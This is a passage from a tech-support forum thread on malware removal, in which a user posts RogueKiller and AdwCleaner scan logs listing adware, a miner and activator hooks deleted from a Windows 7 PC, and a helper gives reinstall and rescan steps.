  • Copy and paste the contents of AdwCleaner[CX].txt in your next reply.
  • A copy of all logfiles is saved to C:\AdwCleaner.
-- Note: The contents of the AdwCleaner log file may be confusing. Unless you see a program name or entry that you recognize and know should not be removed, don't worry about it. If you see an entry you want to keep, return to AdwCleaner before cleaning...all detected items will be listed (and checked) in each tab. Click on and uncheck any items you want to keep.
 

Bruce Betts

TS Rookie
RogueKiller Anti-Malware V13.0.6.0 (x64) [Nov 1 2018] (Free) by Adlice Software
mail : https://adlice.com/contact/?utm_campaign=roguekiller&utm_source=soft&utm_medium=btn
Website : https://adlice.com/download/roguekiller/?utm_campaign=roguekiller&utm_source=soft&utm_medium=btn
Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits
Started in : Normal mode
User : Betts [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Mode : Standard Scan, Delete -- Date : 2018/11/03 21:40:28 (Duration : 00:40:48)
Switches : -refid 3

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Delete ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
[Suspicious.Path (Potentially Malicious)] IEProtectDll64.dll -- %programdata%\{a7fb8cb9-0be2-4c79-bb9c-01f657a649ca}\IEProtectDll64.dll -> Unloaded
[VT.Detected (Malicious)] C:\Windows\Tasks\Opera scheduled Autoupdate 4086469641.job -- C:\Users\Betts\AppData\Roaming\Microsoft\Windows\icfgratf\bafcjfdr.exe -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_CLASSES_ROOT\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_CLASSES_ROOT\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458} -- -> Deleted
[PUP.DriverTalent (Potentially Malicious)] HKEY_LOCAL_MACHINE\Software\OSTotoSoft -- -> Deleted
[PUP.DriverTalent (Potentially Malicious)] HKEY_USERS\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\OSTotoSoft -- -> Deleted
[Root.Wajam|PUP.Gen1 (Malicious)] HKEY_USERS\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\WajIEnhance -- -> Deleted
[PUP.Gen1 (Potentially Malicious)] HKEY_USERS\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\WebApp -- -> Deleted
[PUP.DriverTalent (Potentially Malicious)] HKEY_USERS\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\OSTotoSoft -- -> Deleted
[Root.Wajam|PUP.Gen1 (Malicious)] HKEY_USERS\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\WajIEnhance -- -> Deleted
[PUP.Gen1 (Potentially Malicious)] HKEY_USERS\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\WebApp -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run|6879fe793de5f826544fc9bd3b3ae212 -- "C:\ProgramData\audio.exe" .. -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_USERS\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Microsoft\Windows\CurrentVersion\Run|6879fe793de5f826544fc9bd3b3ae212 -- "C:\ProgramData\audio.exe" .. -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_USERS\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Microsoft\Windows\CurrentVersion\Run|6879fe793de5f826544fc9bd3b3ae212 -- "C:\ProgramData\audio.exe" .. -> Deleted
[VT.Detected (Malicious)] HKEY_USERS\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Microsoft\Windows\CurrentVersion\Run|Blogger -- C:\ProgramData\Blogger\Blogger.exe -> Deleted
[VT.Detected (Malicious)] HKEY_USERS\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Microsoft\Windows\CurrentVersion\Run|Blogger -- C:\ProgramData\Blogger\Blogger.exe -> Deleted
[PUP.DriverTalent (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\LDrvSvc -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\MppSvc -- -> Deleted
[PUP.DriverTalent (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\LDrvSvc -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\MppSvc -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\NFramework -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\NVR0FLASHDev -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\NVR0Dev -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\workframe -- -> Deleted
[PUP.DriverTalent (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\LDrvSvc -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\MppSvc -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\NFramework -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\NVR0Dev -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\NVR0FLASHDev -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\workframe -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{16AE05FF-46DD-44B4-B291-2077CAA0BA12} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Users\Betts\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe|Name=Microsoft SkyDrive| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|TCP Query User{58149CDE-0D65-45DD-A39C-4981BEE6D1F0}C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe|Name=minithunderplatform.exe|Desc=minithunderplatform.exe|Defer=User| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|UDP Query User{44B72B2E-6F9C-4BDC-B150-FD02AC264108}C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe|Name=minithunderplatform.exe|Desc=minithunderplatform.exe|Defer=User| -> Deleted
[PUP.DriverTalent (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{68156B91-CF34-473E-AB1A-FFE48978ABE6} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Program Files (x86)\OSTotoSoft\DriverTalent\DTLService.exe|Name=C:\Program Files (x86)\OSTotoSoft\DriverTalent\DTLService.exe| -> Deleted
[PUP.DriverTalent (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{816EE104-0E87-450F-BD65-331DE3DBA835} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Program Files (x86)\OSTotoSoft\DriverTalent\DriverTalent.exe|Name=C:\Program Files (x86)\OSTotoSoft\DriverTalent\DriverTalent.exe| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{16AE05FF-46DD-44B4-B291-2077CAA0BA12} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Users\Betts\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe|Name=Microsoft SkyDrive| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|TCP Query User{58149CDE-0D65-45DD-A39C-4981BEE6D1F0}C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe|Name=minithunderplatform.exe|Desc=minithunderplatform.exe|Defer=User| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|UDP Query User{44B72B2E-6F9C-4BDC-B150-FD02AC264108}C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe|Name=minithunderplatform.exe|Desc=minithunderplatform.exe|Defer=User| -> Deleted
[PUP.DriverTalent (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{68156B91-CF34-473E-AB1A-FFE48978ABE6} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Program Files (x86)\OSTotoSoft\DriverTalent\DTLService.exe|Name=C:\Program Files (x86)\OSTotoSoft\DriverTalent\DTLService.exe| -> Deleted
[PUP.DriverTalent (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{816EE104-0E87-450F-BD65-331DE3DBA835} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Program Files (x86)\OSTotoSoft\DriverTalent\DriverTalent.exe|Name=C:\Program Files (x86)\OSTotoSoft\DriverTalent\DriverTalent.exe| -> Deleted
[PUP.HackTool (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{E3854BBF-9A19-452A-89A0-959BF2EF2B3F} -- v2.10|Action=Allow|Active=TRUE|Dir=Out|Protocol=6|LPort=1688|App=C:\Windows\KMS-R@1n.exe|Name=KMS-R@1n| -> Deleted
[PUP.HackTool (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{3F3AA956-A3E0-4CAA-8F18-2F414FB764A2} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|LPort=1688|App=C:\Windows\KMS-R@1n.exe|Name=KMS-R@1n| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{A7DC9A53-3EE4-4D87-9CE6-59FB59316143} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=C:\ProgramData\audio.exe|Name=audio.exe| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{6A562CFB-BA08-4E69-B474-AD11C8F29BE4} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\ProgramData\audio.exe|Name=audio.exe| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{B1EA146C-D8A9-419B-9887-8202D3B8C61B} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\ProgramData\audio.exe|Name=audio.exe| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{29BD916A-58BB-4DF6-B96E-F977ECDD3781} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\ProgramData\audio.exe|Name=audio.exe| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{16AE05FF-46DD-44B4-B291-2077CAA0BA12} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Users\Betts\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe|Name=Microsoft SkyDrive| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|UDP Query User{44B72B2E-6F9C-4BDC-B150-FD02AC264108}C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe|Name=minithunderplatform.exe|Desc=minithunderplatform.exe|Defer=User| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|TCP Query User{58149CDE-0D65-45DD-A39C-4981BEE6D1F0}C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe|Name=minithunderplatform.exe|Desc=minithunderplatform.exe|Defer=User| -> Deleted
[PUP.DriverTalent (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{68156B91-CF34-473E-AB1A-FFE48978ABE6} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Program Files (x86)\OSTotoSoft\DriverTalent\DTLService.exe|Name=C:\Program Files (x86)\OSTotoSoft\DriverTalent\DTLService.exe| -> Deleted
[PUP.DriverTalent (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{816EE104-0E87-450F-BD65-331DE3DBA835} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Program Files (x86)\OSTotoSoft\DriverTalent\DriverTalent.exe|Name=C:\Program Files (x86)\OSTotoSoft\DriverTalent\DriverTalent.exe| -> Deleted
[PUP.HackTool (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{3F3AA956-A3E0-4CAA-8F18-2F414FB764A2} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|LPort=1688|App=C:\Windows\KMS-R@1n.exe|Name=KMS-R@1n| -> Deleted
[PUP.HackTool (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{E3854BBF-9A19-452A-89A0-959BF2EF2B3F} -- v2.10|Action=Allow|Active=TRUE|Dir=Out|Protocol=6|LPort=1688|App=C:\Windows\KMS-R@1n.exe|Name=KMS-R@1n| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{A7DC9A53-3EE4-4D87-9CE6-59FB59316143} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=C:\ProgramData\audio.exe|Name=audio.exe| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{6A562CFB-BA08-4E69-B474-AD11C8F29BE4} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\ProgramData\audio.exe|Name=audio.exe| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{29BD916A-58BB-4DF6-B96E-F977ECDD3781} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\ProgramData\audio.exe|Name=audio.exe| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{B1EA146C-D8A9-419B-9887-8202D3B8C61B} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\ProgramData\audio.exe|Name=audio.exe| -> Deleted
[PUP.HackTool (Potentially Malicious)] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OSPPSVC.EXE|Debugger -- KMS-R@1nHook.exe -> Deleted
[PUP.HackTool (Potentially Malicious)] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OSPPSVC.EXE|Debugger -- KMS-R@1nHook.exe -> Deleted
[PUP.HackTool (Potentially Malicious)] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppSvc.exe|Debugger -- KMS-R@1nHook.exe -> Deleted
[PUP.HackTool (Potentially Malicious)] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppSvc.exe|Debugger -- KMS-R@1nHook.exe -> Deleted
[PUM.Desktop (Potentially Malicious)] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore|DisableSR -- 1 -> Deleted
[PUM.StartMenu (Potentially Malicious)] HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced|Start_ShowMyGames -- 0 -> Replaced (1)
[PUM.StartMenu (Potentially Malicious)] HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced|Start_ShowMyGames -- 0 -> Replaced (1)
[PUM.StartMenu (Potentially Malicious)] HKEY_USERS\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced|Start_ShowMyGames -- 0 -> Replaced (1)
[PUM.StartMenu (Potentially Malicious)] HKEY_USERS\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced|Start_ShowMyGames -- 0 -> Replaced (1)
[PUM.StartMenu (Potentially Malicious)] HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced|Start_ShowMyGames -- 0 -> Replaced (1)
[PUM.StartMenu (Potentially Malicious)] HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced|Start_ShowMyGames -- 0 -> Replaced (1)
[PUP.AutoIt.Gen (Potentially Malicious)] RNullFix64.3XE -- %SystemDrive%\32788R22FWJFW\RNullFix64.3XE -> Deleted
[Root.Wajam (Malicious)] MGNiZ.sys [pillactechnology.com] -- %SystemRoot%\System32\drivers\MGNiZ.sys -> Deleted
[PUP.Gen1 (Potentially Malicious)] 快用苹果助手.lnk -- %_Betts_appdata%\Microsoft\Internet Explorer\Quick Launch\快用苹果助手.lnk (lnk => C:\Program Files (x86)\kuaiyong\快用苹果助手.exe []) -> Deleted
[BitMiner.Gen0 (Malicious)] minergate -- %localappdata%\minergate -> Deleted
[Adw.Wizzcaster (Malicious)] ins.exe -- %localappdata%\Temp\is-HS6LQ.tmp\ins.exe -> Deleted
[PUP.DriverTalent (Potentially Malicious)] Driver Talent.lnk -- %programdata%\Microsoft\Windows\Start Menu\Programs\Driver Talent\Driver Talent.lnk (lnk => C:\PROGRA~2\OSTOTO~1\DRIVER~1\DRIVER~1.EXE []) -> Deleted
[PUP.DriverTalent (Potentially Malicious)] Uninstall Driver Talent.lnk -- %programdata%\Microsoft\Windows\Start Menu\Programs\Driver Talent\Uninstall Driver Talent.lnk (lnk => C:\PROGRA~2\OSTOTO~1\DRIVER~1\UNINST~1.EXE []) -> Deleted
[PUP.Gen1 (Potentially Malicious)] 快用苹果助手.lnk -- %programdata%\Microsoft\Windows\Start Menu\Programs\快用苹果助手\快用苹果助手.lnk (lnk => C:\Program Files (x86)\kuaiyong\快用苹果助手.exe []) -> Deleted
[PUP.Gen1 (Potentially Malicious)] 卸载 快用苹果助手.lnk -- %programdata%\Microsoft\Windows\Start Menu\Programs\快用苹果助手\卸载 快用苹果助手.lnk (lnk => C:\Program Files (x86)\kuaiyong\unins000.exe []) -> Deleted
[PUP.DriverTalent (Potentially Malicious)] OSTotoSoft -- %programfiles(x86)%\OSTotoSoft -> Deleted
[PUP.DriverTalent (Potentially Malicious)] OSTotoSoft -- %programfiles(x86)%\OSTotoSoft -> Removed at reboot [2]
[BitMiner.Gen0 (Malicious)] minergate -- %localappdata%\minergate -> Removed at reboot [2]
[PUM.SearchEngine (Potentially Malicious)] browser.search.selectedEngine -- Yahoo! Search -> Deleted
 

Bruce Betts

TS Rookie
Hello! Those are the logs for AdwCleaner and RK.
Unfortunately, I'm unable to run Malwarebytes. This window pops up after trying to run mbytes:
(attached screenshot: Untitled.png)
 

Bruce Betts

TS Rookie
# -------------------------------
# Malwarebytes AdwCleaner 7.2.4.0
# -------------------------------
# Build: 09-25-2018
# Database: 2018-10-31.2 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start: 11-03-2018
# Duration: 00:00:10
# OS: Windows 7 Professional
# Cleaned: 53
# Failed: 2


***** [ Services ] *****

Deleted LDRVSVC

***** [ Folders ] *****

Deleted C:\Program Files (x86)\SAALEPLUS
Deleted C:\ProgramData\DRIVERTALENT
Deleted C:\Users\Betts\AppData\Roaming\DRIVERTALENT
Deleted C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DRIVER TALENT
Deleted C:\Windows\Syswow64\SSL

***** [ Files ] *****

Deleted C:\Users\Betts\Desktop\Facebook.lnk

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks cleaned.

***** [ Registry ] *****

Deleted HKLM\Software\Wow6432Node\Classes\Interface\{349385B4-83FC-4BE1-9DBF-DC0195C65DB4}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{74009D24-8B75-4783-9E69-4566B239FB30}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{41AC4A66-D0C5-4646-BFAE-1041584C43DE}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{EC5A8488-566B-442C-9E5E-259031985B7A}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{39FB51B1-8784-4BD5-A411-F1B7A5DB4D67}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{BBA36C2E-EC79-494A-988D-19398D9222A2}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{54AFDC23-353C-4789-84F5-9C955AD44AC5}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{558F32DF-FA22-4656-B0D2-64DD9EB41F8F}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{F340A9AB-C377-4855-A106-0DAC2893A1A8}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{C3FD9F92-09FA-493C-8C1F-2A3D7DD55DDD}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{C8B204C2-D508-4B71-9CC5-AED5E1302A86}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{75CF0360-C187-4E6E-AB01-6FA65F3DA6CB}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{6BD95127-7C32-4C10-ACF0-1C4687629C85}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{FFC65EC8-C373-4E11-9882-905817219E16}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{9566B021-2079-4C32-8F1F-A26911954C8B}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{2203FA35-9590-4CBA-8AFF-CC53930B7F5C}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{4E695B8D-101C-4F95-B5C7-A7D9D2E975EF}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{3C8BE759-0A8F-4C0D-8CAD-0E5898EAE6AF}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{45C2D25B-0816-419A-B74B-CD4D7024FB71}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{1D7BEA54-B699-4A4D-83D7-D10875B8D7FD}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{0AD8FD27-9029-43A1-B9D5-C54FF18C3DD7}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{078FA2D5-DE68-416E-BA7F-894A4A4EAB6C}
Deleted HKCU\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\LemurLeap
Deleted HKLM\Software\Wow6432Node\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION|DRIVERTALENT.EXE
Deleted HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{29FE44D7-BC89-4188-8B0E-F6BA073C15A5}_is1
Not Deleted HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HiJackThis.exe
Not Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HiJackThis.exe
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{47A1DF02-BCE4-40C3-AE47-E3EA09A65E4A}
Deleted HKLM\Software\Classes\Interface\{47A1DF02-BCE4-40C3-AE47-E3EA09A65E4A}
Deleted HKLM\Software\Wow6432Node\Classes\Interface\{FA7B2795-C0C8-4A58-8672-3F8D80CC0270}
Deleted HKLM\Software\Classes\Interface\{FA7B2795-C0C8-4A58-8672-3F8D80CC0270}
Deleted HKLM\Software\Wow6432Node\Classes\TypeLib\{1112F282-7099-4624-A439-DB29D6551552}
Deleted HKLM\Software\Classes\TypeLib\{1112F282-7099-4624-A439-DB29D6551552}
Deleted HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Ext\Stats\{C4BEF720-313C-420A-ACF6-77DD95D8F553}
Deleted HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Ext\Stats\{29494049-211F-4F5C-8545-7DA8BF7A6CF8}
Deleted HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{52300438-2215-426A-8181-FB18E65B2D4A}
Deleted HKLM\Software\EnigmaSoftwareGroup
Deleted HKCU\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\SweetIM
Deleted HKLM\Software\Wow6432Node\{DAF8B7E5-449D-4180-8281-10E536E597F2}

***** [ Chromium (and derivatives) ] *****

Deleted User-Agent Switcher for Chrome
Deleted Movies Toolbar

***** [ Chromium URLs ] *****

Deleted AVG Secure Search
Deleted Ask
Deleted Ask
Deleted Ask
Deleted AOL
Deleted AOL
Deleted AOL

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [6602 octets] - [03/11/2018 21:57:34]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########
 

Broni

Malware Annihilator
1. Uninstall Malwarebytes' Anti-Malware using Add/Remove Programs (Programs & Features) in the Control Panel.
2. Restart your computer (very important).
3. Download and run this utility.
4. It will ask to restart your computer (please allow it to).
5. After the computer restarts, install the latest version from here.
 

Bruce Betts

TS Rookie
Hello, sorry, something came up.
I've just reinstalled Malwarebytes after cleaning it with the utility; I still get the same error.
 

Broni

Malware Annihilator
Re-run Farbar Recovery Scan Tool (FRST/FRST64) you ran at the very beginning of this topic.

  • Double-click to run it.
  • Make sure you checkmark the Addition.txt box.
  • Press the Scan button.
  • The scan will create two logs, FRST.txt and Addition.txt, in the same directory the tool is run from. Please copy and paste them into your reply.
 